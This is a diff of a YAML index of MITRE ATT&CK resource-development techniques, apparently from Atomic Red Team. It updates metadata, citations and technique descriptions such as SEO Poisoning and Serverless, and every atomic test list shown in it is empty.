-      spec_version: '2.1'
     atomic_tests: []
   T1608:
     technique:
@@ -59673,11 +60342,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.005:
     technique:
-      modified: '2024-04-13T14:03:24.673Z'
+      modified: '2024-10-16T20:09:41.391Z'
       name: Link Target
       description: "Adversaries may put in place resources that are referenced by
         a link that can be used during targeting. An adversary may rely upon a user
@@ -59710,15 +60378,16 @@ resource-development:
         to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
         Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
         In addition, adversaries may serve a variety of malicious links through uniquely
-        generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
-        Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
-        decentralized nature of the InterPlanetary File System (IPFS) to host link
-        targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+        generated URIs/URLs (including one-time, single use links).(Citation: iOS
+        URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+        adversaries may take advantage of the decentralized nature of the InterPlanetary
+        File System (IPFS) to host link targets that are difficult to remove.(Citation:
+        Talos IPFS 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hen Porcilan
       - Diyar Saadi Ali
       - Nikola Kovac
@@ -59802,7 +60471,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.006:
     technique:
@@ -59856,7 +60524,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.003:
     technique:
@@ -59907,36 +60574,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - SOCCRATES
-      - Mnemonic AS
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
-      type: attack-pattern
-      created: '2020-10-01T02:08:33.977Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.002
-        url: https://attack.mitre.org/techniques/T1588/002
-      - source_name: Recorded Future Beacon 2019
-        url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
-        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
-          Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      modified: '2021-10-17T16:17:55.499Z'
+      modified: '2024-09-16T16:20:16.431Z'
       name: Tool
       description: |-
         Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -59945,21 +60586,47 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - SOCCRATES
+      - Mnemonic AS
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+      created: '2020-10-01T02:08:33.977Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/002
+        external_id: T1588.002
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: Recorded Future Beacon 2019
+        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+          Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584.006:
     technique:
-      modified: '2023-04-12T20:19:21.620Z'
+      modified: '2024-10-15T16:44:09.114Z'
       name: Web Services
       description: 'Adversaries may compromise access to third-party web services that
         can be used during targeting. A variety of popular websites exist for legitimate
@@ -60005,17 +60672,16 @@ resource-development:
         external_id: T1584.006
       - source_name: Recorded Future Turla Infra 2020
         description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
-          Tracking Turla Infrastructure. Retrieved October 20, 2020.'
-        url: https://www.recordedfuture.com/turla-apt-infrastructure/
+          Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/research/turla-apt-infrastructure
       - source_name: ThreatConnect Infrastructure Dec 2020
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.001:
     technique:
@@ -60041,7 +60707,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:37:34.563Z'
       name: Social Media Accounts
       description: "Adversaries may create and cultivate social media accounts that
         can be used during targeting. Adversaries can create social media accounts
@@ -60073,8 +60739,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Persona: Social Media'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.004:
     technique:
@@ -60101,7 +60765,7 @@ resource-development:
         url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
         description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
           Exploitation. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:07:53.803Z'
       name: Exploits
       description: |-
         Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -60125,8 +60789,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.003:
     technique:
@@ -60152,7 +60814,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:47:46.409Z'
       name: Install Digital Certificate
       description: "Adversaries may install SSL/TLS certificates that can be used
         during targeting. SSL/TLS certificates are files that can be installed on
@@ -60186,8 +60848,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.002:
     technique:
@@ -60235,7 +60895,7 @@ resource-development:
         Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
 
         By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019)  Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:22:13.578Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: DNS Server
       x_mitre_detection: |-
@@ -60251,7 +60911,6 @@ resource-development:
       - 'Domain Name: Passive DNS'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585:
     technique:
@@ -60310,54 +60969,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
-      type: attack-pattern
-      created: '2020-10-01T01:56:24.776Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588
-        url: https://attack.mitre.org/techniques/T1588
-      - source_name: NationsBuying
-        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
-          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
-        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
-      - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
-        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
-          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
-          Human Rights Defender. Retrieved December 12, 2016.'
-        source_name: PegasusCitizenLab
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: FireEyeSupplyChain
-        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
-          SunshopFireEye. Retrieved March 6, 2017.'
-        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.568Z'
       name: Obtain Capabilities
       description: |-
         Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -60368,22 +60983,66 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
       - 'Malware Repository: Malware Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+      created: '2020-10-01T01:56:24.776Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588
+        external_id: T1588
+      - source_name: PegasusCitizenLab
+        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+          Human Rights Defender. Retrieved December 12, 2016.'
+        url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+      - source_name: FireEyeSupplyChain
+        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+          SunshopFireEye. Retrieved March 6, 2017.'
+        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: NationsBuying
+        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1650:
     technique:
@@ -60446,37 +61105,38 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.007:
     technique:
-      modified: '2022-10-20T21:19:57.555Z'
+      modified: '2024-10-03T14:18:34.045Z'
       name: Serverless
       description: "Adversaries may compromise serverless cloud infrastructure, such
-        as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
-        By utilizing serverless infrastructure, adversaries can make it more difficult
-        to attribute infrastructure used during operations back to them. \n\nOnce
-        compromised, the serverless runtime environment can be leveraged to either
-        respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+        as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+        can be used during targeting. By utilizing serverless infrastructure, adversaries
+        can make it more difficult to attribute infrastructure used during operations
+        back to them. \n\nOnce compromised, the serverless runtime environment can
+        be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
         traffic to an adversary-owned command and control server.(Citation: BlackWater
-        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
-        by these functions will appear to come from subdomains of common cloud providers,
-        it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+        Apps Script Abuse 2021) As traffic generated by these functions will appear
+        to come from subdomains of common cloud providers, it may be difficult to
+        distinguish from ordinary traffic to these providers - making it easier to
+        [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
         Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
         Workers)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -60500,11 +61160,14 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.004:
     technique:
@@ -60562,17 +61225,18 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.006:
     technique:
-      modified: '2023-03-13T20:35:52.302Z'
+      modified: '2024-08-14T15:03:56.383Z'
       name: SEO Poisoning
       description: |-
         Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
 
         To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
 
+        In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
         Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
 
         SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
@@ -60580,7 +61244,7 @@ resource-development:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Vijay Lalwani
       - Will Thomas, Equinix Threat Analysis Center (ETAC)
       - Will Jolliffe
@@ -60594,7 +61258,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -60627,11 +61291,18 @@ resource-development:
         description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
           September 30, 2022.
         url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+      - source_name: Chexmarx-seo
+        description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+          the Star Ranking Game. Retrieved June 18, 2024.'
+        url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+      - source_name: Checkmarx-oss-seo
+        description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+          Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+        url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.003:
     technique:
@@ -60653,7 +61324,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:19:50.018Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -60671,47 +61342,10 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
-      type: attack-pattern
-      created: '2020-10-01T01:30:00.877Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1587
-        url: https://attack.mitre.org/techniques/T1587
-      - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
-        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
-          Units. Retrieved July 18, 2016.
-        source_name: Mandiant APT1
-      - source_name: Kaspersky Sofacy
-        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
-          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
-          December 10, 2015.
-        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
-      - source_name: Bitdefender StrongPity June 2020
-        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
-        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
-          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
-      - source_name: Talos Promethium June 2020
-        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
-        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
-          reach with StrongPity3 APT. Retrieved July 20, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:31:17.270Z'
       name: Develop Capabilities
       description: |-
         Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
@@ -60720,21 +61354,57 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
 
